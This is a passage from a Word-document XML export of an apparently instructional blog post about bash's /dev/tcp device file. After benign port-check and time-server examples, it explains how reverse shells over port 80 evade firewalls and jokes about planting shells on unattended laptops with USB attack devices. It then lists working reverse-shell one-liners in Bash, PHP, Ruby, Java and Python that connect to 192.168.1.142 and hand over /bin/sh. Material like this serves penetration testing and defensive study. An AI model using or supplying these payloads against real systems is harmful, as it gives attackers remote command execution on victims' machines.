          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>It turns out linux has built a </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>/dev/tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> device file. While powerful and useful this file can be extremely dangerous when used in this way. This built in device file lets bash connect directly to any ip and any port out there. This also works well if you want to confirm a port is open, or check the time.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21F72027" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">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val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t xml:space="preserve">$ echo &gt; /dev/tcp/192.168.1.142/22 </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>-bash: connect: Connection refused. ( yey no ssh is open !)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209934F0" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">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val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>$ echo &gt; /dev/tcp/</w:t>
      </w:r>
      <w:hyperlink r:id="rId39" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="20"/>
            <w:szCs w:val="20"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>www.google.com/80</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="30909A94" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">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val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>$ cat &lt;/dev/tcp/time.nist.gov/13</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3686ECDE" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">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val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>57991 17-08-26 13:39:06 50 0 0   0.0 UTC(NIST) *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7139D6F7" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="212428"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId40" w:tooltip="http://www.linuxjournal.com/content/more-using-bashs-built-devtcp-file-tcpip" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>More on Using Bash's Built-in /dev/tcp File (TCP/IP)</w:t>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:br/>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>If you saw yesterday's Tech Tip and were looking for more on using TCP/IP with bash's built-in /dev/tcp device file…</w:t>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>www.linuxjournal.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="52F8A529" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="212428"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>What’s so scary about this? Well, netcat can be listening on any port, and in the example it listened on port 80. This means that the connection and all the traffic flowing through that pipe is going to look like regular http traffic and if that port is open on one of your hosts (as it usually is) then it doesn’t matter what kind of firewall you have, it isn’t going to stop a reverse shell from owning you. Subsequently it doesn’t stop a machine from inside your firewall that has access to the internet </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>**cough**cough</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t> laptops, from using the allowable port, and then pivoting to anything that can be accessible on the internal lan.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27E4F13C" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="212428"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Reverse shells are really fun to play with especially if you have something like a rubber ducky or a bash bunny. That lets you walk up to an unsecured laptop (that you have legitimate access to of course) and snag a shell. Then wait for your victim to come back and…</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15074E63" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">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val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>$ say “im sorry dave i can’t let you do that, you should have locked your computer"</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>$ sudo reboot</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5456D94C" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="212428"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId41" w:tooltip="https://hakshop.com/collections/usb-rubber-ducky" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>USB Rubber Ducky</w:t>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:br/>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Edit description</w:t>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>hakshop.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="22DB0E54" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="212428"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId42" w:tooltip="https://hakshop.com/products/bash-bunny" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Bash Bunny</w:t>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:br/>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>World's most advanced USB attack platform. It opens up attack surfaces that weren't possible before in one single…</w:t>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>hakshop.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="48C17E90" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="212428"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Finally, here are examples of allowing a shell through in a whole bunch of different languages, because well not everything has bash, just most of the things.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4221302E" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">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val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>Bash</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>exec 5&lt;&gt;/dev/tcp/192.168.1.142/80</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">cat &lt;&amp;5 | while read line; do $line 2&gt;&amp;5 &gt;&amp;5; done </w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t># or:</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>while read line 0&lt;&amp;5; do $line 2&gt;&amp;5 &gt;&amp;5; done</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E4234B3" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">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val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>PHP</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>php -r ‘$sock=fsockopen(“192.168.1.142”,80);exec(“/bin/sh -i &lt;&amp;3 &gt;&amp;3 2&gt;&amp;3”);’</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>(Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CEC5E4B" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">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val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>RUBY</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>ruby -rsocket -e’f=TCPSocket.open(“192.168.1.142”,80).to_i;exec sprintf(“/bin/sh -i &lt;&amp;%d &gt;&amp;%d 2&gt;&amp;%d”,f,f,f)’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32EA1D9E" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">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val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:t>JAVA</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>r = Runtime.getRuntime()</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>p = r.exec([“/bin/bash”,”-c”,”exec 5&lt;&gt;/dev/tcp/192.168.1.142/80;cat &lt;&amp;5 | while read line; do \$line 2&gt;&amp;5 &gt;&amp;5; done”] as String[])</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>p.waitFor()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A7EFCFB" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">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lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>PYTHON</w:t>
      </w:r>
      <w:r w:rsidRPr="00835152">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="EAEAEA"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
        <w:br/>
        <w:t>python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((“192.168.1.142”,80));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([“/bin/sh”,”-i”]);’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54BC0711" w14:textId="77777777" w:rsidR="00835152" w:rsidRPr="00835152" w:rsidRDefault="00835152" w:rsidP="00835152">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="212428"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="F6F7F9"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
          <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId43" w:tooltip="http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet" w:history="1">
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:b/>
            <w:bCs/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>Reverse Shell Cheat Sheet</w:t>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:br/>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:i/>
            <w:iCs/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:lang w:val="en-PK" w:eastAsia="en-PK"/>
          </w:rPr>
          <w:t>If you're lucky enough to find a command execution vulnerability during a penetration test, pretty soon afterwards you…</w:t>
        </w:r>
        <w:r w:rsidRPr="00835152">
          <w:rPr>
            <w:rFonts w:ascii="Arial" w:eastAsia="Times New Roman" w:hAnsi="Arial" w:cs="Arial"/>
            <w:color w:val="F6F7F9"/>
            <w:sz w:val="30"/>
            <w:szCs w:val="30"/>
            <w:u w:val="single"/>
